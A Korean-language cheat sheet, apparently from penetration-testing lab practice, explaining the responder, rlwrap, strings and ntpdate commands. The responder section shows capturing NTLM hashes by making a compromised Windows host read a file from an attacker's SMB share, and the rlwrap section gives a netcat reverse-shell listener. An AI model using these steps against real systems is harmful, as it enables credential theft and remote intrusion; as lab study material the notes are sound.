linux command (strings, ntpdate, responder, rlwrap)
which, where, locate 명령어 정리

responder, rlwrap, strings, ntpdate
-
responder
A는 칼리 리눅스이고 B는 target windows 라고 할때 현재 B가 A에 revers shell 로 연결 되있다.
A에서 아래 명령어를 실행하고
responder -I tun0
B의 reverse shell 에서 아래 명령어를 실행하면
type \\10.10.14.8\test\asd.txt
NTLM hash 값을 캡쳐할수 있다.
responder는 로컬 네트워크에서 NTLM(NT LAN Manager) 해시를 캡처하고 중간자 공격을 수행하기 위한 도구입니다.
NTLM은 Microsoft Windows에서 사용되는 인증 프로토콜 중 하나이며, responder는 이를 이용하여 사용자 자격 증명을 채취하는데 사용됩니다.
이제 responder -I tun0 명령어를 자세히 설명하겠습니다:
responder: NTLM 해시를 캡처하고 중간자 공격을 수행하는 도구입니다.
-I tun0: 네트워크 인터페이스를 지정하는 옵션입니다.
여기서 tun0은 터널 인터페이스를 나타냅니다.
특정 네트워크 인터페이스를 지정하여 responder가 해당 인터페이스에서 동작하도록 합니다.
보통 responder는 로컬 네트워크에서 실행되며, 네트워크 내에서 NTLM 인증을 사용하는 시스템과 상호 작용하여 해시를 캡처합니다.
예를 들어, 사용자가 인증을 시도할 때 responder는 그 인증 요청을 가로채서 NTLM 해시를 캡처하고, 이를 이용하여 중간자 공격을 시도할 수 있습니다.
-
rlwrap
rlwrap nc - lvnp 9001
rlwrap은 Readline 래퍼(Readline wrapper)의 약자로, 명령 라인 인터페이스를 향상시키는 도구입니다.
주로 텍스트 기반 프로그램과 함께 사용되며, 명령어 히스토리, 명령어 수정, 자동 완성과 같은 Readline 라이브러리의 기능을 제공합니다.
rlwrap은 특히 네트워크 통신을 위한 명령어나 프로그램을 실행할 때 유용하게 쓰입니다.
주로 nc (netcat)와 함께 사용되어, 텍스트 기반의 서버 또는 클라이언트 프로그램을 보다 효과적으로 다룰 수 있게 해줍니다.
그리고 rlwrap은 이 명령어 앞에 붙어서 사용되어 텍스트 기반으로 입력과 출력을 처리하는 데 도움을 줍니다.
특히, rlwrap을 사용하면 명령어 히스토리를 스크롤하거나 이전 명령을 수정하고 재실행할 수 있는 등의 편리한 기능을 사용할 수 있습니다.
간단히 말해서, rlwrap은 nc 명령어를 더 편리하게 사용할 수 있도록 해주는 도구입니다.
-
strings
strings -e b a.ini
strings 명령어는 주어진 파일에서 인코딩된 문자열을 추출하는 유틸리티입니다.
여기서 -e 옵션은 특정 문자 집합을 지정하는 것이며, b는 빅엔디안(높은 바이트부터 낮은 바이트까지)을 나타냅니다.
그리고 a.ini는 대상 파일의 이름입니다.
strings 명령어는 파일에서 인코딩된 문자열을 추출하는 도구이며, 기본적으로 ASCII 문자열만을 추출하려고 합니다.
그래서 만약 파일에 ASCII 이외의 문자열이 있다면, strings a.ini 명령어로는 그 내용이 출력되지 않을 수 있습니다.
따라서, strings -e b a.ini 명령어는 a.ini 파일에서 빅엔디안으로 인코딩된 문자열을 추출합니다.
문자열은 파일 내에 포함된 텍스트 또는 다른 인코딩된 데이터일 수 있습니다.
이렇게 추출된 문자열은 파일 내에서 발견된 순서대로 출력됩니다.
-
ntpdate
ntpdate 10.10.11.207
칼리 리눅스에서 ntpdate 명령어를 사용하여 특정 NTP 서버(예: 10.10.11.207)로부터 시간을 동기화할 수 있습니다.
이 명령어는 현재 시스템 시간을 지정된 NTP 서버의 시간으로 조정합니다.